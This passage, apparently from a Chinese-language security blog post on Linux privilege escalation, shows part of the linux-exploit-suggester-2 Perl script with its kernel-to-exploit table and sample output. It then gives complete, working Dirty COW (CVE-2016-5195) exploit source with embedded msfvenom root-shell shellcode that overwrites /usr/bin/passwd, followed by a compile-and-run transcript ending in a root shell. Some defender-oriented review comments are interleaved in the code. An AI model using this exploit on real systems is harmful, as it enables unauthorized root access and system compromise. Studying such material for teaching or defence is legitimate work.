                '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
                '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
                '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
                '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
                '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
                '2.6.29', '2.6.30', '2.6.31',
            ],
            cve => '2009-3547',
            mil =>
            'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
        },
        'do_pages_move' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31',
            ],
            alt => 'sieve',
            cve => '2010-0415',
            mil => 'Spenders Enlightenment',
        },
        'reiserfs' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
            ],
            cve => '2010-1146',
            mil => 'http://www.exploit-db.com/exploits/12130',
        },
        'can_bcm' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
                '2.6.36',
            ],
            cve => '2010-2959',
            mil => 'http://www.exploit-db.com/exploits/14814',
        },
        'rds' => {
            vuln => [
                '2.6.30', '2.6.31', '2.6.32', '2.6.33',
                '2.6.34', '2.6.35', '2.6.36',
            ],
            mil => 'http://www.exploit-db.com/exploits/15285',
            cve => '2010-3904',
        },
        'half_nelson1' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
                '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
                '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
                '2.6.36',
            ],
            alt => 'econet',
            cve => '2010-3848',
            mil => 'http://www.exploit-db.com/exploits/17787',
        },
        'half_nelson2' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
                '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
                '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
                '2.6.36',
            ],
            alt => 'econet',
            cve => '2010-3850',
            mil => 'http://www.exploit-db.com/exploits/17787',
        },
        'half_nelson3' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
                '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
                '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
                '2.6.36',
            ],
            alt => 'econet',
            cve => '2010-4073',
            mil => 'http://www.exploit-db.com/exploits/17787',
        },
        'caps_to_root' => {
            vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
            cve => 'n/a',
            mil => 'http://www.exploit-db.com/exploits/15916',
        },
        'american-sign-language' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
                '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
                '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
                '2.6.36',
            ],
            cve => '2010-4347',
            mil => 'http://www.securityfocus.com/bid/45408',
        },
        'pktcdvd' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
                '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
                '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
                '2.6.36',
            ],
            cve => '2010-3437',
            mil => 'http://www.exploit-db.com/exploits/15150',
        },
        'video4linux' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5',
                '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11',
                '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
                '2.6.30', '2.6.31', '2.6.32', '2.6.33',
            ],
            cve => '2010-3081',
            mil => 'http://www.exploit-db.com/exploits/15024',
        },
        'memodipper' => {
            vuln => [
                '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
                '3.0.5', '3.0.6', '3.1.0',
            ],
            cve => '2012-0056',
            mil => 'http://www.exploit-db.com/exploits/18411',
        },
        'semtex' => {
            vuln => [
                '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
                '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0',
            ],
            cve => '2013-2094',
            mil => 'http://www.exploit-db.com/exploits/25444',
        },
        'perf_swevent' => {
            vuln => [
                '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
                '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.4.1',
                '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
                '3.4.9', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
                '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
                '3.8.8', '3.8.9',
            ],
            cve => '2013-2094',
            mil => 'http://www.exploit-db.com/exploits/26131',
        },
        'msr' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
                '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
                '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
                '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6',
                '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.5.0', '3.6.0',
                '3.7.0', '3.7.6',
            ],
            cve => '2013-0268',
            mil => 'http://www.exploit-db.com/exploits/27297',
        },
        'timeoutpwn' => {
            vuln => [
                '3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.9',
                '3.9.0', '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.4.0',
                '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.5', '3.8.6',
                '3.8.9', '3.9.0', '3.9.6', '3.10.0', '3.10.6', '3.11.0',
                '3.12.0', '3.13.0', '3.13.1'
            ],
            cve => '2014-0038',
            mil => 'http://www.exploit-db.com/exploits/31346',
        },
        'rawmodePTY' => {
            vuln => [
                '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
                '2.6.37', '2.6.38', '2.6.39', '3.14.0', '3.15.0'
            ],
            cve => '2014-0196',
            mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
        },
        'overlayfs' => {
            vuln => [
                '3.13.0', '3.16.0', '3.19.0'
            ],
            cve => '2015-8660',
            mil => 'http://www.exploit-db.com/exploits/39230',
        },
        'pp_key' => {
            vuln => [
                '3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
                '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
                '3.8.8', '3.8.9', '3.9.0', '3.9.6', '3.10.0', '3.10.6',
                '3.11.0', '3.12.0', '3.13.0', '3.13.1'
            ],
            cve => '2016-0728',
            mil => 'http://www.exploit-db.com/exploits/39277',
        },
        'dirty_cow' => {
            vuln => [
                '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
                '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
                '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
                '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
                '3.0.5', '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0',
                '3.5.0', '3.6.0', '3.7.0', '3.7.6', '3.8.0', '3.9.0',
                '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
                '3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0', '4.1.0',
                '4.2.0', '4.3.0', '4.4.0', '4.5.0', '4.6.0', '4.7.0'
            ],
            cve => '2016-5195',
            mil => 'http://www.exploit-db.com/exploits/40616',
        },
        'af_packet' => {
            vuln => ['4.4.0' ],
            cve => '2016-8655',
            mil => 'http://www.exploit-db.com/exploits/40871',
        },
        'packet_set_ring' => {
            vuln => ['4.8.0' ],
            cve => '2017-7308',
            mil => 'http://www.exploit-db.com/exploits/41994',
        },
        'clone_newuser' => {
            vuln => [
                '3.3.5', '3.3.4', '3.3.2', '3.2.13', '3.2.9', '3.2.1',
                '3.1.8', '3.0.5', '3.0.4', '3.0.2', '3.0.1', '3.2', '3.0.1', '3.0'
            ],
            cve => 'NA',
            mil => 'http://www.exploit-db.com/exploits/38390',
        },
        'get_rekt' => {
            vuln => [
                '4.4.0', '4.8.0', '4.10.0', '4.13.0'
            ],
            cve => '2017-16695',
            mil => 'http://www.exploit-db.com/exploits/45010',
        },
        'exploit_x' => {
            vuln => [
                '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
                '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
                '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
                '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
                '3.0.5', '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0',
                '3.5.0', '3.6.0', '3.7.0', '3.7.6', '3.8.0', '3.9.0',
                '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
                '3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0', '4.1.0',
                '4.2.0', '4.3.0', '4.4.0', '4.5.0', '4.6.0', '4.7.0'
            ],
            cve => '2018-14665',
            mil => 'http://www.exploit-db.com/exploits/45697',
        },
    );
}
__END__
=head1 NAME
linux_exploit_suggester-2.pl - A local exploit suggester for linux
=head1 DESCRIPTION
This perl script will enumerate the possible exploits available for a given kernel version
=head1 USAGE
[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu
You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.
=head1 AUTHOR
Jonathan Donas (c) 2019
=head1 CHANGELOG
27-03-2019 added exploit download menu
31-12-2018 added exploit_x
30-11-2018 added get_rekt
15-04-2018 added clone_newuser
23-11-2017 added packet_set_ring
05-11-2017 added af_packet
28-04-2017 added dirty_cow
25-07-2016 added overlayfs and pp_key
=cut
=head1 LICENSE
Linux Exploit Suggester 2
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
=cut
运行工具会列出当前Linux内核可能存在的漏洞。
user@debian:~/tools/kernel-exploits/linux-exploit-suggester-2$ perl linux-exploit-suggester-2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.32
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[5] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[6] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[8] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[9] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[10] ptrace_kmod2
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[11] rawmodePTY
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[12] rds
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[13] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[14] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
在列出的信息中看到存在"Dirty COW",利用代码如下
user@debian:~/tools/kernel-exploits/dirtycow$ cat c0w.c
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
* madvise 0
* ptrace 0
* $ /usr/bin/passwd
* [root@server foo]# whoami
* root
* [root@server foo]# id
* uid=0(root) gid=501(foo) groups=501(foo)
* @KrE80r
*/
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>
/* Shared state, global because it is touched from main, the forked child and
 * the madvise thread. */
int f;              /* read-only descriptor of the target binary (main) */
void *map;          /* private read-only mmap of that file (main) */
pid_t pid;          /* child pid in the parent, 0 in the child (fork in main) */
pthread_t pth;      /* madvise thread handle, child side */
struct stat st;     /* fstat of the target, used for its size */
// change if no permissions to read
/* Target: a root-owned setuid binary the current user can read. Defender
 * note: main copies this file to /tmp/bak before anything else, which is a
 * concrete on-host artifact. */
char suid_binary[] = "/usr/bin/passwd";
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
/* x86-64 ELF image (generated by the msfvenom command in the comment above)
 * that main writes over the start of the target's mapping. sc_len must equal
 * sizeof shell_code: 14 rows of 12 bytes plus a final row of 9 = 177. */
unsigned char shell_code[] = {
    0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
    0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
    0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
    0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
    0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
/* Byte count of shell_code; main uses it as the poke range. */
unsigned int sc_len = 177;
/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char shell_code[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/
/* Child-side worker: repeatedly discards the first 100 bytes' worth of pages
 * of the private mapping with madvise(MADV_DONTNEED) while the parent writes
 * into the same mapping via ptrace — the copy-on-write race of the CVE named
 * in the file header. Runs a fixed 200,000,000 iterations and prints the
 * summed madvise() return values. arg is unused.
 * NOTE(review): declared to return void* but falls off the end without a
 * return statement (undefined behaviour); pthread_join in main ignores the
 * value, so nothing reads it. */
void *madviseThread(void *arg) {
    int i,c=0;
    for(i=0;i<200000000;i++)
        c+=madvise(map,100,MADV_DONTNEED);
    printf("madvise %dnn",c);
}
/* Entry point. Flow: back up the target, map it read-only and private, fork;
 * the child (traced and stopped) runs madviseThread while the parent writes
 * shell_code into the mapping with PTRACE_POKETEXT. Per the transcript that
 * follows this listing, the next execution of the target then runs the payload
 * as root. Command-line arguments are ignored.
 * Portability/UB notes (review): system()/asprintf() need <stdlib.h> (and
 * _GNU_SOURCE for asprintf) and kill()/SIGSTOP need <signal.h>, none of which
 * are included; "%x" is not a valid conversion for a pointer value; for the
 * last offsets *(long*)(shell_code+o) reads past the end of the 177-byte
 * array and may be misaligned. Return values of open/fstat/mmap/fork/ptrace
 * are not checked.
 * Host artifacts a defender can look for: the /tmp/bak copy of the target, a
 * process ptrace()ing its own child with very high madvise/ptrace call rates,
 * and the target binary's contents no longer matching its package. */
int main(int argc,char *argv[]){
    /* Banner; the literal below appears to have lost its line-continuation
     * backslashes in this listing and is kept as rendered. */
    printf(" n
(___) n
(o o)_____/ n
@@ ` \ n
\ ____, /%s n
// // n
^^ ^^ n
", suid_binary);
    char *backup;
    printf("DirtyCow root privilege escalationn");
    printf("Backing up %s to /tmp/bakn", suid_binary);
    /* Backup through a shell `cp`; suid_binary is a compile-time constant here. */
    asprintf(&backup, "cp %s /tmp/bak", suid_binary);
    system(backup);
    /* A read-only descriptor suffices: the modification does not go through
     * the file descriptor. */
    f=open(suid_binary,O_RDONLY);
    fstat(f,&st);
    /* Private read-only mapping of the whole file plus one word of slack
     * (presumably so the last word-sized poke stays inside the mapping —
     * intent not stated). */
    map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
    printf("mmap %xnn",map);
    pid=fork();
    if(pid){
        /* Parent: wait until the traced child has stopped itself, then poke
         * shell_code word by word at each byte offset, 10000 times per
         * offset, for 10000/sc_len passes; c accumulates ptrace() results. */
        waitpid(pid,NULL,0);
        int u,i,o,c=0,l=sc_len;
        for(i=0;i<10000/l;i++)
            for(o=0;o<l;o++)
                for(u=0;u<10000;u++)
                    c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
        printf("ptrace %dnn",c);
    }
    else{
        /* Child: start the madvise thread, make itself traceable by the
         * parent and stop so the parent's waitpid() returns. */
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(),SIGSTOP);
        pthread_join(pth,NULL);
    }
    return 0;
}
使用gcc编译该代码并运行
user@debian:~/tools/kernel-exploits/dirtycow$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
user@debian:~/tools/kernel-exploits/dirtycow$ ls
c0w c0w.c
user@debian:~/tools/kernel-exploits/dirtycow$ ./c0w
(___)
(o o)_____/
@@ `
____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 4ea71000
^C
user@debian:~/tools/kernel-exploits/dirtycow$ /usr/bin/passwd
root@debian:/home/user/tools/kernel-exploits/dirtycow# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
原文始发于微信公众号(安全小白):Linux提权(二)